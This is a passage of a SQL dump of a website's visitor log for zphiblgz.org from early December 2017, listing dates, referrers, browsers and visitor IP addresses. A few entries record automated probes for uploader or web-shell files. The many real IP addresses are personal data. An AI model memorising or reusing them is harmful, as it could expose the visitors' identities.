dVqmGSc309lanJf9ymw34e0ncHDc_0QWBFk409LDGWVvXct','AppleWebKit','iPhone','604.3.5','','198.204.189.245','000',10,0),(14672,'2017-12-01','https://zphiblgz.org','MSIE','Windows','6.0','','174.127.133.58','000',4,0),(14673,'2017-12-01','https://zphiblgz.org','MSIE','Windows','6.0','','174.127.133.60','000',10,0),(14674,'2017-12-01','https://zphiblgz.org','MSIE','Windows','6.0','','174.127.133.55','000',6,0),(14675,'2017-12-01','https://zphiblgz.org','MSIE','Windows','6.0','','174.127.133.54','000',2,0),(14676,'2017-12-01','https://zphiblgz.org','MSIE','Windows','6.0','','174.127.133.56','000',2,0),(14677,'2017-12-01','https://zphiblgz.org','MSIE','Windows','6.0','','174.127.133.57','000',8,0),(14678,'2017-12-01','https://zphiblgz.org','Firefox','Windows','57.0','','198.51.197.42','000',4,0),(14679,'2017-12-01','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','94.141.20.180','000',2,0),(14680,'2017-12-01','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',4,0),(14681,'2017-12-01','https://www.google.com/','Chrome','Windows','62.0.3202.94','','204.126.132.241','000',2,0),(14682,'2017-12-01','https://zphiblgz.org','Safari','iPhone','8.0','','35.192.107.155','000',2,0),(14683,'2017-12-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(14684,'2017-12-01','http://site.ru','Chrome','Windows','5.0.375.99','','138.197.217.55','000',2,0),(14685,'2017-12-01','http://site.ru','Chrome','Windows','5.0.375.99','','115.124.114.16','000',2,0),(14686,'2017-12-01','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','105.105.86.147','000',2,0),(14687,'2017-12-01','https://zphiblgz.org','MSIE','Windows','6.0','','217.147.170.28','000',1,0),(14688,'2017-12-01','https://zphiblgz.org','MSIE','Windows','6.0','','91.230.211.67','000',1,0),(14689,'2017-12-01','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','66.198.240.16','000',2,0),(14690,'2017-12-01','https://zphiblgz.org','Firefox','Windows','29.0','','138.128.9.91','000',2,0),(14691,'2017-12-01','https://www.google.com/','Chrome','Macintosh','62.0.3202.94','','108.91.137.185','000',6,0),(14692,'2017-12-01','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.3','000',1,0),(14693,'2017-12-01','http://site.ru','Chrome','Windows','5.0.375.99','','91.215.216.103','000',1,0),(14694,'2017-12-01','http://site.ru','Chrome','Windows','5.0.375.99','','173.237.185.55','000',1,0),(14695,'2017-12-02','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',190,0),(14696,'2017-12-02','http://site.ru','Chrome','Windows','5.0.375.99','','185.49.20.77','000',1,0),(14697,'2017-12-02','http://site.ru','Chrome','Windows','5.0.375.99','','69.89.31.120','000',1,0),(14698,'2017-12-02','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(14699,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(14700,'2017-12-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.36.27.4','000',1,0),(14701,'2017-12-02','http://site.ru','Chrome','Windows','5.0.375.99','','185.97.253.11','000',4,0),(14702,'2017-12-02','http://site.ru','Chrome','Windows','5.0.375.99','','81.169.144.135','000',1,0),(14703,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.105.116','000',2,0),(14704,'2017-12-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.17.101.79','000',1,0),(14705,'2017-12-02','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','104.152.168.16','000',2,0),(14706,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.165','000',1,0),(14707,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',1,0),(14708,'2017-12-02','https://zphiblgz.org','Firefox','Windows','34.0','','54.250.167.7','000',1,0),(14709,'2017-12-02','https://zphiblgz.org','Firefox','Windows','40.1','','62.195.189.195','000',3,0),(14710,'2017-12-02','https://zphiblgz.org','Chrome','Chrome OS','62.0.3202.82','','69.143.35.179','000',1,0),(14711,'2017-12-02','https://zphiblgz.org','Firefox','Windows','34.0','','52.196.60.202','000',1,0),(14712,'2017-12-02','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','212.227.114.95','000',2,0),(14713,'2017-12-02','http://site.ru','Chrome','Windows','5.0.375.99','','130.255.170.20','000',1,0),(14714,'2017-12-02','https://zphiblgz.org','Firefox','Windows','34.0','','52.196.57.150','000',1,0),(14715,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.31','000',1,0),(14716,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','197.231.221.211','000',1,0),(14717,'2017-12-02','https://zphiblgz.org/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(14718,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(14719,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.76.81','000',1,0),(14720,'2017-12-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(14721,'2017-12-02','http://site.ru','Chrome','Windows','5.0.375.99','','82.165.155.94','000',1,0),(14722,'2017-12-02','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATP02LXJxU9GahrG49kn4Na4jfGvPkrwr56z8vibLg4rfWMhiafZp6uq9r0Ma3GAo2z0CfJeTnIqU7St4r2_JcneEWi9XIflXy8','AppleWebKit','iPhone','604.3.5','','71.114.37.67','000',3,0),(14723,'2017-12-02','https://zphiblgz.org','Java','Unknown','1.7.0','','52.26.163.1','000',5,0),(14724,'2017-12-02','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14725,'2017-12-02','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.129.101','000',2,0),(14726,'2017-12-02','http://site.ru','Chrome','Windows','5.0.375.99','','87.236.20.174','000',2,0),(14727,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.36.117.185','000',1,0),(14728,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.163.85','000',1,0),(14729,'2017-12-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','173.208.153.75','000',1,0),(14730,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.164','000',1,0),(14731,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.122.50','000',1,0),(14732,'2017-12-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','5.199.130.188','000',3,0),(14733,'2017-12-02','https://zphiblgz.org','Chrome','Windows','25.0.1364.172','','144.76.153.198','000',1,0),(14734,'2017-12-02','http://www.zphibmaryland.org/chapters/','Chrome','Windows','62.0.3202.94','','73.39.82.175','000',3,0),(14735,'2017-12-02','http://www.wvheatingandcooling.com/wordpress/wp-login.php','Mechanize','Unknown','2.7.3','','46.102.98.189','000',1,0),(14736,'2017-12-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.20','000',1,0),(14737,'2017-12-02','http://site.ru','Chrome','Windows','5.0.375.99','','212.53.140.22','000',1,0),(14738,'2017-12-02','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.94.86','000',2,0),(14739,'2017-12-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.87.185.45','000',1,0),(14740,'2017-12-02','http://zphiblgz.org/','Opera Next','Windows','44.0.2510.857','','176.103.214.94','000',3,0),(14741,'2017-12-02','zphiblgz.org','Opera','Windows','8.50','','195.22.125.82','000',2,0),(14742,'2017-12-02','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','70.174.40.102','000',13,0),(14743,'2017-12-02','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(14744,'2017-12-03','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',73,0),(14745,'2017-12-03','https://www.google.com/','Safari','iPad','9.0','','96.255.163.84','000',3,0),(14746,'2017-12-03','https://zphiblgz.org','Firefox','Windows','40.1','','79.115.222.110','000',6,0),(14747,'2017-12-03','http://site.ru','Chrome','Windows','5.0.375.99','','87.236.20.58','000',1,0),(14748,'2017-12-03','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(14749,'2017-12-03','http://www.wmgocanton.com/wp/wp-login.php','Mechanize','Unknown','2.7.3','','191.96.143.20','000',1,0),(14750,'2017-12-03','http://site.ru','Chrome','Windows','5.0.375.99','','38.123.253.100','000',1,0),(14751,'2017-12-03','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.255.139','000',2,0),(14752,'2017-12-03','http://zphiblgz.org/','MSIE','Windows','9.0','','146.185.223.221','000',3,0),(14753,'2017-12-03','http://zphiblgz.org/a%3E%20%3C/li%3E%20%20%20%20%20%20%3Cdiv%20class=','Chrome','Windows','56.0.2924.87','','146.185.223.25','000',4,0),(14754,'2017-12-03','https://zphiblgz.org','Firefox','Linux','3.6.4','','46.105.100.183','000',2,0),(14755,'2017-12-03','http://site.ru','Chrome','Windows','5.0.375.99','','212.59.186.61','000',2,0),(14756,'2017-12-03','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','73.129.50.191','000',2,0),(14757,'2017-12-03','http://site.ru','Chrome','Windows','5.0.375.99','','141.255.189.228','000',1,0),(14758,'2017-12-03','https://www.google.com/','Safari','iPhone','11.0','','173.66.131.52','000',7,0),(14759,'2017-12-03','https://zphiblgz.org','Chrome','Chrome OS','62.0.3202.82','','69.143.35.179','000',1,0),(14760,'2017-12-03','https://zphiblgz.org','Firefox','Windows','40.1','','149.3.19.108','000',4,0),(14761,'2017-12-03','http://site.ru','Chrome','Windows','5.0.375.99','','74.220.202.28','000',2,0),(14762,'2017-12-03','http://site.ru','Chrome','Windows','5.0.375.99','','184.168.200.93','000',2,0),(14763,'2017-12-03','http://zphiblgz.org/','Firefox','Macintosh','54.0','','179.158.138.121','000',3,0),(14764,'2017-12-03','https://zphiblgz.org','Chrome','Linux','59.0.3071.115','','192.198.80.227','000',2,0),(14765,'2017-12-03','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.196.40','000',2,0),(14766,'2017-12-03','https://zphiblgz.org/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(14767,'2017-12-03','http://site.ru','Chrome','Windows','5.0.375.99','','91.215.216.103','000',1,0),(14768,'2017-12-03','http://www.xn--j1abcw7d.xn--j1amh/blog/wp-login.php','Mechanize','Unknown','2.7.3','','198.46.214.90','000',1,0),(14769,'2017-12-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(14770,'2017-12-03','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(14771,'2017-12-03','https://zphiblgz.org','Chrome','Windows','62.0.3202.89','','71.244.137.169','000',10,0),(14772,'2017-12-03','https://www.facebook.com/','Chrome','Windows','62.0.3202.94','','71.179.179.151','000',6,0),(14773,'2017-12-03','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','71.244.137.169','000',5,0),(14774,'2017-12-03','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','73.173.103.21','000',5,0),(14775,'2017-12-03','http://search.smt.docomo.ne.jp/result?MT=%E3%83%93%E3%83%BC%E3%83%A0%E3%83%88%E3%83%AD%E3%83%AA%E3%83%BC&SID=s08&SPAGE=1&UNIT=11&IND=0C0&PAGE=2&URANK=11&TPLID=01','Chrome','Android','62.0.3202.84','','49.98.152.40','000',3,0),(14776,'2017-12-03','https://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',1,0),(14777,'2017-12-03','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','89.28.24.190','000',2,0),(14778,'2017-12-03','https://zphiblgz.org','Chrome','Android','56.0.2924.87','','172.58.24.249','000',2,0),(14779,'2017-12-03','https://www.google.com/','Chrome','Windows','40.0.2214.93','','161.32.231.53','000',4,0),(14780,'2017-12-03','https://zphiblgz.org','Firefox','Windows','40.1','','213.76.244.163','000',3,0),(14781,'2017-12-03','https://zphiblgz.org','Firefox','Linux','3.6.4','','188.165.233.228','000',39,0),(14782,'2017-12-04','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',67,0),(14783,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','217.61.0.54','000',2,0),(14784,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.104.120.2','000',2,0),(14785,'2017-12-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.14','000',1,0),(14786,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','205.134.252.186','000',2,0),(14787,'2017-12-04','https://zphiblgz.org','Firefox','Windows','17.0','','104.218.63.75','000',1,0),(14788,'2017-12-04','https://zphiblgz.org','Firefox','Windows','17.0','','51.15.56.11','000',2,0),(14789,'2017-12-04','https://zphiblgz.org','Firefox','Windows','17.0','','195.22.126.147','000',1,0),(14790,'2017-12-04','https://zphiblgz.org','Firefox','Windows','17.0','','163.172.137.174','000',14,0),(14791,'2017-12-04','https://zphiblgz.org','Firefox','Macintosh','54.0','','192.198.80.227','000',2,0),(14792,'2017-12-04','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.51','000',2,0),(14793,'2017-12-04','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.157','000',1,0),(14794,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','213.251.182.115','000',3,0),(14795,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','103.67.235.110','000',2,0),(14796,'2017-12-04','https://www.google.com/','Chrome','Windows','43.0.2357.134','','163.172.21.204','000',2,0),(14797,'2017-12-04','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14798,'2017-12-04','http://zphiblgz.org/wp-content/plugins/ubh/up.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(14799,'2017-12-04','https://lm.facebook.com/','Chrome','Android','62.0.3202.84','','71.244.137.250','000',7,0),(14800,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.215.7','000',1,0),(14801,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.90.90','000',3,0),(14802,'2017-12-04','http://www.zphibmaryland.org/chapters/','Chrome','Windows','62.0.3202.94','','69.195.247.116','000',5,0),(14803,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.115','000',2,0),(14804,'2017-12-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','89.31.57.5','000',1,0),(14805,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','95.130.12.12','000',1,0),(14806,'2017-12-04','https://zphiblgz.org/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(14807,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','172.98.193.43','000',1,0),(14808,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.164.131.95','000',1,0),(14809,'2017-12-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','93.115.95.207','000',1,0),(14810,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.163','000',1,0),(14811,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',1,0),(14812,'2017-12-04','https://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','178.159.37.31','000',1,0),(14813,'2017-12-04','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','96.70.152.174','000',2,0),(14814,'2017-12-04','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.100.149.189','000',1,0),(14815,'2017-12-04','https://www.google.com/','Chrome','Windows','62.0.3202.94','','131.171.200.2','000',15,0),(14816,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.36.27.6','000',2,0),(14817,'2017-12-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(14818,'2017-12-04','http://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','146.185.223.150','000',4,0),(14819,'2017-12-04','https://zphiblgz.org','Chrome','Linux','51.0.2704.103','','51.15.200.166','000',1,0),(14820,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.212.104','000',1,0),(14821,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.94.195','000',2,0),(14822,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',1,0),(14823,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.45.46','000',2,0),(14824,'2017-12-04','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(14825,'2017-12-04','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.74.86','000',1,0),(14826,'2017-12-04','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','62.210.177.87','000',2,0),(14827,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','92.48.206.67','000',1,0),(14828,'2017-12-04','https://zphiblgz.org','Java','Unknown','1.7.0','','52.26.163.1','000',4,0),(14829,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.171.202.150','000',2,0),(14830,'2017-12-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.15.16.4','000',1,0),(14831,'2017-12-04','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.129.101','000',2,0),(14832,'2017-12-04','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.10','000',1,0),(14833,'2017-12-04','https://zphiblgz.org/','MSIE','Windows','9.0','','204.79.180.15','000',1,0),(14834,'2017-12-04','http://zphiblgz.org/','Chrome','Macintosh','57.0.2987.133','','163.172.4.153','000',1,0),(14835,'2017-12-04','https://zphiblgz.org/','MSIE','Windows','11.0','','163.172.4.153','000',1,0),(14836,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','197.231.221.211','000',5,0),(14837,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.12','000',2,0),(14838,'2017-12-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.25','000',1,0),(14839,'2017-12-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(14840,'2017-12-04','https://www.google.com/','Chrome','Android','62.0.3202.84','','98.253.42.167','000',2,0),(14841,'2017-12-04','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','69.140.240.88','000',3,0),(14842,'2017-12-04','https://www.google.com/','Safari','iPhone','11.0','','69.140.240.88','000',4,0),(14843,'2017-12-04','https://www.google.com/','Chrome','Windows','62.0.3202.94','','167.102.191.10','000',7,0),(14844,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','79.96.172.121','000',3,0),(14845,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','129.121.179.95','000',2,0),(14846,'2017-12-04','http://site.ru','Chrome','Windows','5.0.375.99','','91.134.248.235','000',2,0),(14847,'2017-12-05','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',231,0),(14848,'2017-12-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.243','000',1,0),(14849,'2017-12-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(14850,'2017-12-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.160.102.165','000',1,0),(14851,'2017-12-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',1,0),(14852,'2017-12-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(14853,'2017-12-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.119','000',1,0),(14854,'2017-12-05','https://zphiblgz.org/author/przphiblgz-org/','Safari','iPhone','11.0','','69.140.240.88','000',2,0),(14855,'2017-12-05','https://zphiblgz.org','Firefox','Windows','40.1','','82.158.20.131','000',2,0),(14856,'2017-12-05','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(14857,'2017-12-05','https://zphiblgz.org','Firefox','Windows','40.1','','87.11.128.62','000',2,0),(14858,'2017-12-05','https://zphiblgz.org','Firefox','Windows','34.0','','37.79.174.61','000',1,0),(14859,'2017-12-05','https://zphiblgz.org','MSIE','Windows','11.0','','50.193.144.17','000',5,0),(14860,'2017-12-05','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','137.74.46.103','000',2,0),(14861,'2017-12-05','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.187','000',1,0),(14862,'2017-12-05','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','50.225.39.78','000',2,0),(14863,'2017-12-05','https://zphiblgz.org/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(14864,'2017-12-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(14865,'2017-12-05','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','145.239.89.243','000',2,0),(14866,'2017-12-05','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','217.182.72.199','000',2,0),(14867,'2017-12-05','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','100.36.72.187','000',2,0),(14868,'2017-12-05','https://zphiblgz.org','MSIE','Windows','11.0','','149.101.1.119','000',2,0),(14869,'2017-12-05','https://www.google.com/','Safari','iPhone','11.0','','172.58.185.190','000',9,0),(14870,'2017-12-05','https://zphiblgz.org','Safari','iPhone','11.0','','71.121.238.28','000',3,0),(14871,'2017-12-05','http://zphiblgz.org/wp-includes/Text/Diff/apsvxipg.php','Edge','Windows','15.15063','','97.74.24.115','000',1,0),(14872,'2017-12-05','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','164.132.107.61','000',2,0),(14873,'2017-12-05','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.154','000',2,0),(14874,'2017-12-05','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.16','000',1,0),(14875,'2017-12-05','https://zphiblgz.org','Firefox','Windows','40.1','','49.147.128.56','000',2,0),(14876,'2017-12-05','https://zphiblgz.org','Safari','iPhone','10.0','','69.250.65.28','000',2,0),(14877,'2017-12-06','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',115,0),(14878,'2017-12-06','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.196.80','000',2,0),(14879,'2017-12-06','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.135','000',2,0),(14880,'2017-12-06','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.205','000',2,0),(14881,'2017-12-06','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.37','000',2,0),(14882,'2017-12-06','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.158','000',2,0),(14883,'2017-12-06','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.196.55','000',1,0),(14884,'2017-12-06','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.114.167','000',2,0),(14885,'2017-12-06','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','166.137.244.45','000',2,0),(14886,'2017-12-06','https://zphiblgz.org','Firefox','Windows','34.0','','83.220.238.187','000',1,0),(14887,'2017-12-06','https://zphiblgz.org','Firefox','Linux','4.0b9pre','','106.120.151.76','000',4,0),(14888,'2017-12-06','https://zphiblgz.org','Firefox','Windows','34.0','','188.162.166.70','000',1,0),(14889,'2017-12-06','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(14890,'2017-12-06','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','62.210.180.142','000',2,0),(14891,'2017-12-06','http://site.ru','Chrome','Windows','5.0.375.99','','209.59.141.132','000',2,0),(14892,'2017-12-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','123.131.106.92','000',16,0),(14893,'2017-12-06','https://zphiblgz.org','Firefox','Windows','48.0','','78.85.135.85','000',1,0),(14894,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.43.205','000',1,0),(14895,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','216.17.101.79','000',1,0),(14896,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.107.180.110','000',1,0),(14897,'2017-12-06','https://zphiblgz.org','MSIE','Windows','10.0','','211.114.35.194','000',1,0),(14898,'2017-12-06','https://zphiblgz.org','MSIE','Windows','6.0','','93.88.77.34','000',1,0),(14899,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.179.129','000',2,0),(14900,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','192.160.102.170','000',1,0),(14901,'2017-12-06','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(14902,'2017-12-06','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','54.87.35.70','000',2,0),(14903,'2017-12-06','http://site.ru','Chrome','Windows','5.0.375.99','','194.54.83.94','000',1,0),(14904,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',4,0),(14905,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.102.148.67','000',1,0),(14906,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.212.115','000',2,0),(14907,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','171.25.193.77','000',1,0),(14908,'2017-12-06','http://zphiblgz.org/scholarship/','Chrome','Macintosh','61.0.3163.100','','50.225.39.76','000',1,0),(14909,'2017-12-06','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.89.96','000',2,0),(14910,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.202','000',2,0),(14911,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','166.70.207.2','000',1,0),(14912,'2017-12-06','https://zphiblgz.org','MSIE','Windows','11.0','','46.229.170.197','000',1,0),(14913,'2017-12-06','https://zphiblgz.org','G-i-g-a-b-o-t','Unknown','Unknown','','65.132.59.34','000',2,0),(14914,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','128.31.0.13','000',1,0),(14915,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','197.231.221.211','000',2,0),(14916,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.217.217','000',1,0),(14917,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','95.130.11.216','000',1,0),(14918,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.99.70.236','000',2,0),(14919,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.63.229','000',3,0),(14920,'2017-12-06','http://site.ru','Chrome','Windows','5.0.375.99','','151.236.44.148','000',2,0),(14921,'2017-12-06','https://zphiblgz.org','Safari','iPhone','11.0','','216.99.180.242','000',3,0),(14922,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','95.130.9.90','000',2,0),(14923,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.243','000',2,0),(14924,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','64.113.32.29','000',2,0),(14925,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.224.47','000',1,0),(14926,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.132','000',1,0),(14927,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(14928,'2017-12-06','http://zphiblgz.org/','Firefox','Windows','7.0.1','','199.249.223.63','000',1,0),(14929,'2017-12-06','http://site.ru','Chrome','Windows','5.0.375.99','','185.58.73.26','000',2,0),(14930,'2017-12-06','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','208.110.82.26','000',2,0),(14931,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',1,0),(14932,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.14','000',1,0),(14933,'2017-12-06','https://zphiblgz.org','Edge','Windows','14.14393','','68.134.9.53','000',6,0),(14934,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.84.108','000',1,0),(14935,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.200','000',2,0),(14936,'2017-12-06','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.187.58','000',1,0),(14937,'2017-12-06','https://zphiblgz.org','curl','Unknown','7.29.0','','93.39.201.69','000',1,0),(14938,'2017-12-06','https://zphiblgz.org','Safari','iPhone','11.0','','216.99.180.240','000',2,0),(14939,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(14940,'2017-12-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.73.206','000',1,0),(14941,'2017-12-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',23,0),(14942,'2017-12-06','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',5,0),(